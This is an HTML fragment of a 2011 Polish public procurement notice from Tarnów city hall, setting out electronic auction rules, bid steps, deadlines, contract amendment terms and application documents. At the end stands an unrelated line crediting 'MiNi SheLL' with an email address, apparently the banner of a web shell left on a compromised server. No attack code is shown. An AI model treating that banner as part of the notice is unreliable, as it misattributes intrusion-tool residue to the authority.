<p><b>IV.4.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> IV.4.9.1) Po zalogowaniu się na platformie, Wykonawcy uzyskują dostęp do aplikacji umożliwiającej składanie ofert. W czasie trwania licytacji (od otwarcia licytacji do jej zamknięcia) Wykonawcy składają swoje oferty cenowe w postaci elektronicznej.
IV.4.9.2) Zamawiający i wykonawcy od momentu otwarcia do momentu zamknięcia licytacji przekazują wnioski, oświadczenia i inne informacje drogą elektroniczną.
IV.4.9.3) Oferty składane przez Wykonawców podlegają automatycznej klasyfikacji na podstawie ceny. System umożliwia składanie wyłącznie ofert o cenie niższej niż oferta wiodąca w danym momencie. Oferta złożona w toku licytacji przestaje wiązać, gdy inny Wykonawca złożył ofertę korzystniejszą. 
IV.4.9.4) W trakcie licytacji elektronicznej system na bieżąco udostępnia wszystkim Wykonawcom informacje o pozycji złożonych przez nich ofert, liczbie Wykonawców biorących udział w licytacji elektronicznej, oraz cenach złożonych przez nich ofert, z tym że do momentu zamknięcia licytacji elektronicznej nie ujawnia się informacji umożliwiających identyfikację wykonawców. 
IV.4.9.5.) Cena wywoławcza: 145 000.00 zł (brutto). 
IV.4.9.6) Minimalny krok postąpienia: 500.00 zł (brutto). System nie przyjmie postąpienia, którego wysokość jest mniejsza od określonego minimalnego postąpienia. Wysokość postąpienia jest liczona w odniesieniu do najkorzystniejszej oferty złożonej w danej licytacji.
IV.4.9.7) System dopuszcza składanie postąpień z dokładnością do jednego grosza. Wartość groszy należy wpisywać po kropce..</p>
<p><b>IV.4.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li><table><tr><td style="font-size: 10pt;"><b>Licytacja jednoetapowa </b>          </td><td></td><td style="font-size: 10pt;"><b>czas trwania:</b> 1 godzina</td></tr>
</table></li></ul>

<p><b>IV.4.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 29.12.2011 godzina 10:00, miejsce: Urząd Miasta Tarnowa, Kancelaria Główna, 33-100 Tarnów, ul. Nowa 4, pok. 1 A.</p>
<p><b>IV.4.12) Termin otwarcia licytacji elektronicznej:</b> Termin otwarcia licytacji elektronicznej 5 dni po terminie przekazania zaproszeń,
o godzinie 10:00. 
Termin rozpoczęcia licytacji elektronicznej zostanie podany Wykonawcom w zaproszeniu do udziału w licytacji elektronicznej..</p>
<p><b>IV.4.13) Termin i warunki zamknięcia licytacji elektronicznej </b><i>(jeżeli dotyczy):</i></p>
<p>1) zamknięcie licytacji elektronicznej nastąpi 1 godzinę po otwarciu licytacji.
UWAGA:
Czas, o którym mowa w pkt IV.4.13) odnosi się do czasu serwera podawanego na stronie licytacje.uzp.gov.pl
2) Po zamknięciu licytacji elektronicznej Zamawiający</p>
<p><b>IV.4.14 Wymagania dotyczące zabezpieczenia należytego wykonania umowy </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Nie dotyczy</p>
<p><b>IV.4.15 Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>1.	Zamawiający przewiduje możliwość dokonania zmian postanowień umowy w przypadkach:
a)	zmiany stawek podatku od towarów i usług - w takim przypadku wynagrodzenie wykonawcy zostanie odpowiednio pomniejszone lub powiększone,
b)	przekształceń wykonawcy lub zbycia przedsiębiorstwa. 
c)	zmiany danych adresowych Stron lub zmiany rachunku bankowego Wykonawcy.
2.	Każda ze Stron zobowiązana jest niezwłocznie poinformować o okolicznościach stanowiących podstawę do dokonania zmiany w umowie.
3.	Wszelkie zmiany umowy mogą być dokonywane wyłącznie w formie aneksu do umowy pod rygorem nieważności z uwzględnieniem art. 144 ustawy Prawo zamówień publicznych.
4.	Sprzedawca nie może przenieść na osobę trzecią praw lub obowiązków wynikających z umowy w całości lub części, z zastrzeżeniem ust. 1 lit. b).</p>
<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> IV.4.16.1) Osoba uprawniona przez Zamawiającego do kontaktu z wykonawcami: 
Danuta Warzyca, tel. 14 6882-449.
IV.4.16.2) Opis sposobu sporządzenia wniosku i forma dokumentów.
a) 	Wniosek o dopuszczenie do udziału w licytacji należy sporządzić w formie pisemnej w języku polskim - wg wzoru stanowiącego załącznik nr 2 do ogłoszenia.
b) Wniosek o dopuszczenie do udziału w licytacji oraz oświadczenia (opisane w pkt III.4.1) i pkt III.4.2) - według wzorów określonych w załącznikach nr 2, 3 i 5 do ogłoszenia) mają być podpisane przez osobę/osoby upoważnione do reprezentowania wykonawcy. W przypadku, gdy uprawnienie do podpisania wniosku i oświadczenia nie wynika z dokumentu, o którym mowa w pkt III.4.2) do oferty należy załączyć stosowne upoważnienie (pełnomocnictwo). Pełnomocnictwo musi być przedłożone w formie oryginału lub kopii poświadczonej notarialnie. Pełnomocnictwo w sposób jednoznaczny ma określać, do jakich czynności upoważniona jest osoba.
c) Do wniosku o dopuszczenie do udziału w licytacji należy dołączyć dokumenty 
i oświadczenia, o których mowa w pkt III. 4.1), pkt III.4.2), z zastrzeżeniem pkt III.4.3) i pkt. III.6).
d) Dokumenty wymienione w pkt. III.4.2) i pkt. III.4.3) mają być przedstawione w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. 
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, kopie dokumentów dotyczących odpowiednio wykonawców lub tych podmiotów są poświadczane za zgodność z oryginałem przez wykonawcę lub te podmioty.
e) 	Dokumenty sporządzone w języku obcym są składane z tłumaczeniem na język polski, poświadczonym przez osoby upoważnione do reprezentowania wykonawcy.
IV.4.16.3) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego (konsorcjum).
a) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego (konsorcjum) są zobowiązani ustanowić Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i do zawarcia umowy.
b) Konsorcjum składa jeden wniosek o dopuszczenie do udziału, przy czym wymagane dokumenty wskazane w pkt. III.4.2) składa każdy z uczestników konsorcjum. 
c) Oświadczenia, o których mowa w pkt III.4.1) i pkt III.4.2) powinny być złożone z uwzględnieniem treści art. 23 ust. 3 Pzp i podpisane przez Wykonawcę lub osobę upoważnioną do jego reprezentowania.
IV.4.6.14) Załącznikami do niniejszego ogłoszenia, udostępnionymi na stronie Zamawiającego są:
a) formularz cenowy - załącznik nr 1
b) wzór - wniosek o dopuszczenie do udziału w licytacji - załącznik nr 2
c) wzór - oświadczenie z art. 22 ust. 1 ustawy - załącznik nr 3
d) wzór - projekt umowy - załącznik nr 4
e) wzór - oświadczenie o niepodleganiu wykluczeniu - załącznik nr 5..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com